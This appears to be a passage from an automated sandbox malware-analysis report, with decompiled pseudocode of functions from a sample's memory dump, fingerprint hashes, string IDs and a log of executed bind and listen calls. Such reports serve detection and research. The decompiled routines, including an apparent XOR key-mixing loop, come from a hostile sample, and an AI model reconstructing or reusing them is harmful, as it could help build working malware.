                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
                                                                      • API String ID: 0-3237638986
                                                                      • Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                      • Instruction ID: de2ef75429b9d25e5ab621e8c991456a735ddaab97b2e64fa32712dee2dd5dba
                                                                      • Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                      • Instruction Fuzzy Hash: 0A4184B190021CAFDF20DF94DE45ADE3BA8EF14304F104566F918D7191D7B89A94CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 45%
                                                                      			E00A260BE(signed int _a4) {
                                                                      				char _v5;
                                                                      				char _v6;
                                                                      				char _v7;
                                                                      				char _v8;
                                                                      				char _v9;
                                                                      				char _v10;
                                                                      				char _v11;
                                                                      				char _v12;
                                                                      				char _v13;
                                                                      				char _v14;
                                                                      				char _v15;
                                                                      				char _v16;
                                                                      				char _v17;
                                                                      				char _v18;
                                                                      				char _v19;
                                                                      				char _v20;
                                                                      				char _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				char _v291;
                                                                      				char _v292;
                                                                      				char _v547;
                                                                      				char _v548;
                                                                      				char _v1058;
                                                                      				char _v1060;
                                                                      				char _v1570;
                                                                      				char _v1572;
                                                                      				char* _t81;
                                                                      				char* _t82;
                                                                      				signed int _t84;
                                                                      				signed int _t85;
                                                                      				signed int _t87;
                                                                      				signed int _t89;
                                                                      				signed int _t92;
                                                                      				signed int _t97;
                                                                      				intOrPtr* _t102;
                                                                      				signed short* _t103;
                                                                      				intOrPtr _t106;
                                                                      				void* _t107;
                                                                      
                                                                      				_t85 = 0;
                                                                      				_v20 = 0xa3;
                                                                      				_v19 = 0x1e;
                                                                      				_v18 = 0xf3;
                                                                      				_v17 = 0x69;
                                                                      				_v16 = 7;
                                                                      				_v15 = 0x62;
                                                                      				_v14 = 0xd9;
                                                                      				_v13 = 0x1f;
                                                                      				_v12 = 0x1e;
                                                                      				_v11 = 0xe9;
                                                                      				_v10 = 0x35;
                                                                      				_v9 = 0x7d;
                                                                      				_v8 = 0x4f;
                                                                      				_v7 = 0xd2;
                                                                      				_v6 = 0x7d;
                                                                      				_v5 = 0x48;
                                                                      				_v292 = 0;
                                                                      				L00A303F4();
                                                                      				_v548 = 0;
                                                                      				L00A303F4();
                                                                      				_v1572 = 0;
                                                                      				L00A303F4();
                                                                      				_v1060 = 0;
                                                                      				L00A303F4();
                                                                      				_v36 = _a4 + 4;
                                                                      				_a4 = 0;
                                                                      				_v24 = 0xff;
                                                                      				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
                                                                      				_v24 = 0xff;
                                                                      				 *0x412018( &_v548,  &_v24);
                                                                      				_t102 =  *0x4120d0;
                                                                      				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                      				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                      				_t81 =  &_v292;
                                                                      				_push(_t81);
                                                                      				L00A303B6();
                                                                      				_v32 = _t81;
                                                                      				_t82 =  &_v548;
                                                                      				_push(_t82);
                                                                      				L00A303B6();
                                                                      				_t106 = _v36;
                                                                      				_v28 = _t82;
                                                                      				_push(0x10);
                                                                      				_push( &_v20);
                                                                      				_push(_t106);
                                                                      				L00A3043C();
                                                                      				_t84 = 0xba0da71d;
                                                                      				if(_v28 > 0) {
                                                                      					_t103 =  &_v1060;
                                                                      					do {
                                                                      						_t97 = _a4 & 0x80000003;
                                                                      						if(_t97 < 0) {
                                                                      							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
                                                                      						}
                                                                      						_t89 = ( *_t103 & 0x0000ffff) * _t84;
                                                                      						_t84 = _t84 * 0xbc8f;
                                                                      						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
                                                                      						_a4 = _a4 + 1;
                                                                      						_t103 =  &(_t103[1]);
                                                                      					} while (_a4 < _v28);
                                                                      				}
                                                                      				if(_v32 > _t85) {
                                                                      					do {
                                                                      						_t92 = _a4 & 0x80000003;
                                                                      						if(_t92 < 0) {
                                                                      							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
                                                                      						}
                                                                      						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
                                                                      						_t84 = _t84 * 0xbc8f;
                                                                      						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
                                                                      						_a4 = _a4 + 1;
                                                                      						_t85 = _t85 + 1;
                                                                      					} while (_t85 < _v32);
                                                                      				}
                                                                      				return _t84;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp
• Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5$H$O$b$i$}$}
                                                                      • API String ID: 0-3760989150
                                                                      • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                      • Instruction ID: 9744b08bd9d50a5650b96e240a44797ca118f59f01bb2781674a8e0cd528414e
                                                                      • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                      • Instruction Fuzzy Hash: 3151B671C0425DEEDB11CBA8CC81EEEBBBCEF49314F0442A9E555A6192D3349B85CB61
Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00A21642(void* __fp0) {
                                                                      				void* __esi;
                                                                      				void* _t65;
                                                                      				signed int _t89;
                                                                      				void* _t92;
                                                                      				intOrPtr _t106;
                                                                      				void* _t108;
                                                                      				void* _t110;
                                                                      				void* _t111;
                                                                      				void* _t118;
                                                                      
                                                                      				_t118 = __fp0;
                                                                      				_t108 = _t110 - 0x70;
                                                                      				_t111 = _t110 - 0x474;
                                                                      				 *((intOrPtr*)(_t108 + 0x40)) = 0x412774;
                                                                      				 *((intOrPtr*)(_t108 + 0x44)) = 0x412784;
                                                                      				 *((intOrPtr*)(_t108 + 0x48)) = 0x412794;
                                                                      				 *((intOrPtr*)(_t108 + 0x4c)) = 0x4127a4;
                                                                      				 *((intOrPtr*)(_t108 + 0x50)) = 0x4127b4;
                                                                      				 *((intOrPtr*)(_t108 + 0x54)) = 0x4127c0;
                                                                      				 *((intOrPtr*)(_t108 + 0x58)) = 0x4127cc;
                                                                      				 *((intOrPtr*)(_t108 + 0x5c)) = 0x4127d8;
                                                                      				 *((intOrPtr*)(_t108 + 0x20)) = 0x41263c;
                                                                      				 *((intOrPtr*)(_t108 + 0x24)) = 0x412648;
                                                                      				 *((intOrPtr*)(_t108 + 0x28)) = 0x4127e4;
                                                                      				 *((intOrPtr*)(_t108 + 0x2c)) = 0x412664;
                                                                      				 *((intOrPtr*)(_t108 + 0x30)) = 0x4126b4;
                                                                      				 *((intOrPtr*)(_t108 + 0x34)) = 0x4126c0;
                                                                      				 *((intOrPtr*)(_t108 + 0x38)) = 0x4127f4;
                                                                      				 *((intOrPtr*)(_t108 + 0x3c)) = 0x4126dc;
                                                                      				 *((intOrPtr*)(_t108 + 0x60)) = 0x412800;
                                                                      				 *((intOrPtr*)(_t108 + 0x64)) = 0x412810;
                                                                      				 *((intOrPtr*)(_t108 + 0x68)) = 0x412820;
                                                                      				 *((intOrPtr*)(_t108 + 0x6c)) = 0x412834;
                                                                      				_t89 = 0;
                                                                      				do {
                                                                      					_push(0x7f);
                                                                      					_push(0);
                                                                      					_push(_t108 - 0x5f);
                                                                      					 *((char*)(_t108 - 0x60)) = 0;
                                                                      					L00A303F4();
                                                                      					_t111 = _t111 + 0xc;
                                                                      					_t97 = _t89 << 2;
                                                                      					_t65 = E00A21819(_t108 - 0x60,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + (_t89 << 2) + 0x50)));
                                                                      					if(_t65 != 0) {
                                                                      						E00A2104A(_t108 - 0x404);
                                                                      						_push(_t108 - 0x60);
                                                                      						_push(_t108 - 0x1f0);
                                                                      						L00A303FA();
                                                                      						_pop(_t92);
                                                                      						 *((intOrPtr*)(_t108 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x78)) + 0xb1c));
                                                                      						_t37 = _t89 + 1; // 0x1
                                                                      						 *((intOrPtr*)(_t108 - 0x1f4)) = _t37;
                                                                      						E00A21819(_t108 - 0x2f4,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x20)));
                                                                      						E00A21819(_t108 - 0x3f8,  *((intOrPtr*)(_t108 + 0x7c)), 0x412844);
                                                                      						E00A21819(_t108 - 0x374,  *((intOrPtr*)(_t108 + 0x7c)), 0x412854);
                                                                      						if(_t89 != 3) {
                                                                      							E00A21819(_t108 - 0x274,  *((intOrPtr*)(_t108 + 0x7c)), 0x412664);
                                                                      							E00A2D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)), 0x4126dc, _t108 - 0x68);
                                                                      							_t111 = _t111 + 0xc;
                                                                      						}
                                                                      						E00A2D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x30)), _t108 - 0x70);
                                                                      						E00A2D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x60)), _t108 - 0x6c);
                                                                      						_t106 =  *((intOrPtr*)(_t108 + 0x78));
                                                                      						_t111 = _t111 + 0x18;
                                                                      						E00A212DE(_t106, _t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x40)), _t108 - 0x170, 1);
                                                                      						_push(_t106 + 0xa9c);
                                                                      						_push(_t108 - 0xf0);
                                                                      						L00A303FA();
                                                                      						_t65 = E00A21279(_t108 - 0x404, _t118, _t106);
                                                                      					}
                                                                      					_t89 = _t89 + 1;
                                                                      				} while (_t89 < 4);
                                                                      				return _t65;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp
• Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
                                                                      • API String ID: 0-2857912252
                                                                      • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                      • Instruction ID: b212b6850cda3b7767e073777c64630710d0f5ee35b221875f596eb6023833ef
                                                                      • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                      • Instruction Fuzzy Hash: 2A514BB190025D9FDF24DF64DE859DD3BB8FF04308F10806AF928A6152D3B599A9CF98
Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00A22E88(intOrPtr* __edi, void* __eflags) {
                                                                      				void* __esi;
                                                                      				intOrPtr* _t49;
                                                                      				intOrPtr* _t50;
                                                                      				intOrPtr* _t51;
                                                                      				intOrPtr* _t53;
                                                                      				intOrPtr* _t54;
                                                                      				intOrPtr* _t59;
                                                                      
                                                                      				_t60 = __edi;
                                                                      				E00A27340(__edi, __eflags);
                                                                      				 *((intOrPtr*)(__edi + 0x1d8)) = 0;
                                                                      				 *((intOrPtr*)(__edi + 0x1cc)) = 0;
                                                                      				 *((intOrPtr*)(__edi + 0x1d0)) = 0;
                                                                      				 *((intOrPtr*)(__edi + 0x1d4)) = 0;
                                                                      				_t5 = _t60 + 0x1e0; // 0x1e0
                                                                      				_t49 = _t5;
                                                                      				 *((intOrPtr*)(__edi + 0x1dc)) = 0x100;
                                                                      				 *_t49 = 0x413754;
                                                                      				 *((intOrPtr*)(_t49 + 0x10)) = 0;
                                                                      				 *((intOrPtr*)(_t49 + 4)) = 0;
                                                                      				 *((intOrPtr*)(_t49 + 8)) = 0;
                                                                      				 *((intOrPtr*)(_t49 + 0x14)) = 0x100;
                                                                      				 *((intOrPtr*)(_t49 + 0xc)) = 0;
                                                                      				 *_t49 = 0x413760;
                                                                      				 *((intOrPtr*)(__edi + 0x1c8)) = 0x413758;
                                                                      				_t13 = _t60 + 0x1f8; // 0x1f8
                                                                      				_t50 = _t13;
                                                                      				 *((intOrPtr*)(_t50 + 4)) = 0;
                                                                      				 *((intOrPtr*)(_t50 + 8)) = 0;
                                                                      				 *((intOrPtr*)(_t50 + 0xc)) = 0;
                                                                      				 *((intOrPtr*)(_t50 + 0x10)) = 0;
                                                                      				 *((intOrPtr*)(_t50 + 0x14)) = 0;
                                                                      				 *((intOrPtr*)(_t50 + 0x18)) = 0;
                                                                      				 *((intOrPtr*)(_t50 + 0x1c)) = 0;
                                                                      				 *_t50 = 0;
                                                                      				_t21 = _t60 + 0x630; // 0x630
                                                                      				_t51 = _t21;
                                                                      				 *((intOrPtr*)(_t51 + 8)) = 0x20;
                                                                      				 *_t51 = 0;
                                                                      				 *((intOrPtr*)(_t51 + 0xc)) = 0;
                                                                      				 *((intOrPtr*)(_t51 + 4)) = 0;
                                                                      				 *((char*)(__edi + 0x52a)) = 0;
                                                                      				_t26 = _t60 + 0x64c; // 0x64c
                                                                      				 *((intOrPtr*)(__edi + 0x640)) = 0x412e80;
                                                                      				E00A23549(_t26);
                                                                      				 *((intOrPtr*)(__edi + 0x858)) = 0x413144;
                                                                      				 *((intOrPtr*)(__edi + 0x86c)) = 0x4130f0;
                                                                      				_t30 = _t60 + 0x870; // 0x870
                                                                      				_t53 = _t30;
                                                                      				 *_t53 = 0x4130f0;
                                                                      				_t31 = _t60 + 0x878; // 0x878
                                                                      				_t59 = _t31;
                                                                      				 *_t59 = 0x413144;
                                                                      				 *_t53 = 0x412f34;
                                                                      				_t32 = _t60 + 0x87c; // 0x87c
                                                                      				_t54 = _t32;
                                                                      				 *__edi = 0x412e98;
                                                                      				 *((intOrPtr*)(__edi + 0x1c8)) = 0x412f1c;
                                                                      				 *((intOrPtr*)(__edi + 0x1e0)) = 0x413760;
                                                                      				 *((intOrPtr*)(__edi + 0x640)) = 0x412f24;
                                                                      				 *((intOrPtr*)(__edi + 0x858)) = 0x412f2c;
                                                                      				 *((intOrPtr*)(__edi + 0x86c)) = 0x412f30;
                                                                      				 *_t59 = 0x412f38;
                                                                      				_t38 = _t60 + 0x890; // 0x890
                                                                      				 *_t54 = 0x413bd8;
                                                                      				 *((intOrPtr*)(_t54 + 8)) = 0;
                                                                      				 *((intOrPtr*)(_t54 + 0x10)) = 0;
                                                                      				 *((intOrPtr*)(_t54 + 4)) = 0;
                                                                      				 *((intOrPtr*)(_t54 + 0xc)) = 0;
                                                                      				E00A23549(_t38);
                                                                      				 *((char*)(__edi + 0xb20)) = 0;
                                                                      				 *((char*)(__edi + 0xc25)) = 0;
                                                                      				 *((char*)(__edi + 0xd2a)) = 0;
                                                                      				 *((char*)(__edi + 0xe2f)) = 0;
                                                                      				 *((char*)(__edi + 0xa9c)) = 0;
                                                                      				return __edi;
                                                                      			}











                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp
                                                                       • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $/A$,/A$0/A$X7A$`7A
                                                                      • API String ID: 0-851144607
                                                                      • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                      • Instruction ID: e0111944a10148795aabd4865a47a67b1f4a633f2d7cb1200b439f3e7dd4a68a
                                                                      • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                      • Instruction Fuzzy Hash: 1D4182B0655642EFC309CF2AC5846C1FBE0BB09314F95C2AFC46C9B221C7B4A565CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00A23021(intOrPtr* __esi) {
                                                                      				void* __edi;
                                                                      				intOrPtr* _t20;
                                                                      				void* _t24;
                                                                      
                                                                      				_t20 = __esi + 0x878;
                                                                      				 *__esi = 0x412e98;
                                                                      				 *((intOrPtr*)(__esi + 0x1c8)) = 0x412f1c;
                                                                      				 *((intOrPtr*)(__esi + 0x1e0)) = 0x413760;
                                                                      				 *((intOrPtr*)(__esi + 0x640)) = 0x412f24;
                                                                      				 *((intOrPtr*)(__esi + 0x858)) = 0x412f2c;
                                                                      				 *((intOrPtr*)(__esi + 0x86c)) = 0x412f30;
                                                                      				 *((intOrPtr*)(__esi + 0x870)) = 0x412f34;
                                                                      				 *_t20 = 0x412f38;
                                                                      				E00A23663(__esi + 0x890);
                                                                      				 *((intOrPtr*)(__esi + 0x87c)) = 0x413bd8;
                                                                      				E00A2D71D(__esi + 0x87c);
                                                                      				 *_t20 = 0x413144;
                                                                      				 *((intOrPtr*)(__esi + 0x870)) = 0x4130f0;
                                                                      				E00A23663(__esi + 0x64c);
                                                                      				E00A22FE4(__esi + 0x1c8, _t24);
                                                                      				return E00A2744A(__esi);
                                                                      			}







                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp
                                                                       • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $/A$,/A$0/A$4/A$`7A
                                                                      • API String ID: 0-2435369464
                                                                      • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                      • Instruction ID: dc1a950633c852bbc28ee7ccbded789ebe96e95a9b1ba680f1584e951910242f
                                                                      • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                      • Instruction Fuzzy Hash: A7011DB5000B55CAD721EF24D2406C6BBF4FB45305F10C91FE4EA4B204DBB8A29ADF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E009E9829(intOrPtr _a4, signed char* _a8, intOrPtr _a12, char _a16, signed int* _a20) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				intOrPtr _v16;
                                                                      				signed int _v20;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t66;
                                                                      				void* _t70;
                                                                      				intOrPtr _t71;
                                                                      				signed int _t74;
                                                                      				signed int _t84;
                                                                      				void* _t85;
                                                                      				signed int _t94;
                                                                      				signed int* _t95;
                                                                      				signed int _t96;
                                                                      				signed int* _t97;
                                                                      				signed char* _t100;
                                                                      				signed int _t101;
                                                                      				signed char _t104;
                                                                      				signed char* _t136;
                                                                      				intOrPtr _t140;
                                                                      
                                                                      				_t136 = _a8;
                                                                      				_v20 = 0;
                                                                      				_v8 = 0;
                                                                      				_v12 = 1;
                                                                      				_v16 = 0x4435dc;
                                                                      				if(_t136 != 0) {
                                                                      					_t101 =  *_t136 & 0x000000ff;
                                                                      					if(_t101 == 0x84) {
                                                                      						_t101 = _t136[0x23] & 0x000000ff;
                                                                      					}
                                                                      					if(_t101 != 0x9c) {
                                                                      						L8:
                                                                      						if(_t101 == 0x5e || _t101 == 0x82 || _t101 == 0x81) {
                                                                      							_t140 = _a4;
                                                                      							_t66 = E009E980E(_t140);
                                                                      							_v8 = _t66;
                                                                      							if(_t66 == 0) {
                                                                      								goto L22;
                                                                      							}
                                                                      							if((_t136[2] & 0x00000400) == 0) {
                                                                      								_push(_t136[4]);
                                                                      								_t71 = E009DCE3A(0x44a3c8, _v16);
                                                                      								_v20 = _t71;
                                                                      								if(_t71 != 0) {
                                                                      									_t129 = _v8;
                                                                      									if(_v8 != 0) {
                                                                      										E009E93C1(0x41315e, _t129, _t71, 1);
                                                                      									}
                                                                      									if(_t101 == 0x82) {
                                                                      										 *((char*)(_v8 + 0x1e)) = 2;
                                                                      									}
                                                                      									L27:
                                                                      									if(_t101 == 0x81 || _t101 == 0x82) {
                                                                      										if(_a16 != 0x62) {
                                                                      											goto L31;
                                                                      										}
                                                                      										_push(0x63);
                                                                      										goto L32;
                                                                      									} else {
                                                                      										L31:
                                                                      										_push(_a16);
                                                                      										L32:
                                                                      										E009EBE00(_v8);
                                                                      										_t74 = _v8;
                                                                      										if(( *(_t74 + 0x1c) & 0x0000000c) != 0) {
                                                                      											 *(_t74 + 0x1c) =  *(_t74 + 0x1c) & 0x0000fffd;
                                                                      										}
                                                                      										goto L34;
                                                                      									}
                                                                      								}
                                                                      								goto L22;
                                                                      							}
                                                                      							E009E9280(_v8, _t136[4] * _v12, _t136[4] * _v12 >> 0x20);
                                                                      							goto L27;
                                                                      						} else {
                                                                      							if(_t101 != 0x9c) {
                                                                      								if(_t101 != 0x83) {
                                                                      									L36:
                                                                      									 *_a20 = _v8;
                                                                      									goto L37;
                                                                      								}
                                                                      								_t140 = _a4;
                                                                      								_t84 = E009E980E(_t140);
                                                                      								_v8 = _t84;
                                                                      								if(_t84 == 0) {
                                                                      									L22:
                                                                      									 *((char*)(_t140 + 0x1e)) = 1;
                                                                      									E009DC16B(_t140, _v20);
                                                                      									E009E9A4C(_v8);
                                                                      									 *_a20 =  *_a20 & 0x00000000;
                                                                      									_t70 = 7;
                                                                      									return _t70;
                                                                      								}
                                                                      								_t85 = E009DD157(_t136[4] + 2);
                                                                      								asm("cdq");
                                                                      								E009E93C1(0x41315e, _v8, E009DD801(_t140, 0x9c, _t136[4] + 2, _t85 - 1), 0);
                                                                      								L17:
                                                                      								L34:
                                                                      								_t108 = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									E009EBCAB(_t108);
                                                                      								}
                                                                      								goto L36;
                                                                      							}
                                                                      							L12:
                                                                      							if(E009E9829(_a4, _t136[8], _a12, _a16,  &_v8) != 0) {
                                                                      								goto L34;
                                                                      							}
                                                                      							E009E91BB(_v8);
                                                                      							_t94 = _v8;
                                                                      							_t95 = _t94 + 0x10;
                                                                      							asm("adc edx, 0x0");
                                                                      							 *_t95 =  ~( *_t95);
                                                                      							_t95[1] =  ~( *(_t94 + 0x14));
                                                                      							_t96 = _v8;
                                                                      							_t97 = _t96 + 8;
                                                                      							asm("adc edx, 0x0");
                                                                      							 *_t97 =  ~( *_t97);
                                                                      							_t97[1] =  ~( *(_t96 + 0xc));
                                                                      							E009EBE00(_v8, _a16);
                                                                      							goto L17;
                                                                      						}
                                                                      					}
                                                                      					_t100 = _t136[8];
                                                                      					_t104 =  *_t100;
                                                                      					if(_t104 == 0x81 || _t104 == 0x82) {
                                                                      						_v12 = _v12 | 0xffffffff;
                                                                      						_t136 = _t100;
                                                                      						_t101 =  *_t136 & 0x000000ff;
                                                                      						_v16 = 0x44a3c4;
                                                                      						goto L8;
                                                                      					} else {
                                                                      						goto L12;
                                                                      					}
                                                                      				} else {
                                                                      					 *_a20 = 0;
                                                                      					L37:
                                                                      					return 0;
                                                                      				}
                                                                      			}
























                                                                      0x009e99b0
                                                                      0x009e998f
                                                                      0x00000000
                                                                      0x009e98b1
                                                                      0x009e98b3
                                                                      0x009e991e
                                                                      0x009e9a3d
                                                                      0x009e9a43
                                                                      0x00000000
                                                                      0x009e9a43
                                                                      0x009e9924
                                                                      0x009e9927
                                                                      0x009e992e
                                                                      0x009e9931
                                                                      0x009e99b2
                                                                      0x009e99b5
                                                                      0x009e99ba
                                                                      0x009e99c4
                                                                      0x009e99cc
                                                                      0x009e99d1
                                                                      0x00000000
                                                                      0x009e99d1
                                                                      0x009e993a
                                                                      0x009e9944
                                                                      0x009e9961
                                                                      0x009e9967
                                                                      0x009e9a31
                                                                      0x009e9a31
                                                                      0x009e9a36
                                                                      0x009e9a38
                                                                      0x009e9a38
                                                                      0x00000000
                                                                      0x009e9a36
                                                                      0x009e98b5
                                                                      0x009e98cf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009e98d8
                                                                      0x009e98dd
                                                                      0x009e98e3
                                                                      0x009e98ed
                                                                      0x009e98f0
                                                                      0x009e98f4
                                                                      0x009e98f7
                                                                      0x009e98fd
                                                                      0x009e9904
                                                                      0x009e9909
                                                                      0x009e990b
                                                                      0x009e9911
                                                                      0x00000000
                                                                      0x009e9911
                                                                      0x009e9893
                                                                      0x009e9871
                                                                      0x009e9874
                                                                      0x009e9879
                                                                      0x009e9880
                                                                      0x009e9884
                                                                      0x009e9886
                                                                      0x009e9889
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009e984f
                                                                      0x009e9852
                                                                      0x009e9a45
                                                                      0x00000000
                                                                      0x009e9a45

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ^$^1A$^1A$b
                                                                      • API String ID: 0-1727528133
                                                                      • Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                      • Instruction ID: d7a12745d958c58b1c032ebe26f77a95406c8678ea59c5a92040660aad731d2c
                                                                      • Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                      • Instruction Fuzzy Hash: 97610471A00285EFDF16CF6AC8817AD7BB5EF85310F248169E815AB392D735DE40CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      • bind.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD1027
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: bind
                                                                      • String ID:
                                                                      • API String ID: 1187836755-0
                                                                      • Opcode ID: 37d551dc0bc5ca85c61be3e7f82b5c987de620be8e403f9564f623d205ea2964
                                                                      • Instruction ID: f34109b26be4cf2fb7e66074b27866e714f5546f2172d08b50509e6d6601b56f
                                                                      • Opcode Fuzzy Hash: 37d551dc0bc5ca85c61be3e7f82b5c987de620be8e403f9564f623d205ea2964
                                                                      • Instruction Fuzzy Hash: 1F21A371509380AFE7128F65CC84F96BFB8EF46310F1884ABE944DF152D264A909CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • listen.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      • Opcode ID: 9ffd0301635224dd9b57691321b06019993ad62f810d0d53575c19afbed8b4d7
                                                                      • Instruction ID: c8a6d0b7eb48c4e56b44c584fce0defb29facaa30e8400431146ea02e448f6f8
                                                                      • Opcode Fuzzy Hash: 9ffd0301635224dd9b57691321b06019993ad62f810d0d53575c19afbed8b4d7
                                                                      • Instruction Fuzzy Hash: 3F21B2B2409784AFE712CF54DC85F56BFA8EF46324F08849BE9449F193D274A905CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • bind.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD1027
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: bind
                                                                      • String ID:
                                                                      • API String ID: 1187836755-0
                                                                      • Opcode ID: 4ef36db3b571db788360a97c960abc272ac74144bfc6afe698c709a8e90068d3
                                                                      • Instruction ID: 1e4ee2a7e93c0b0d0e85df526aed739ee8024828e4c76c2baf49f69d3e7ffb7f
                                                                      • Opcode Fuzzy Hash: 4ef36db3b571db788360a97c960abc272ac74144bfc6afe698c709a8e90068d3
                                                                      • Instruction Fuzzy Hash: 7911BF72900244AFEB20DF55DD84FA6FBACEF44720F18846BEE099B241D674A509CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
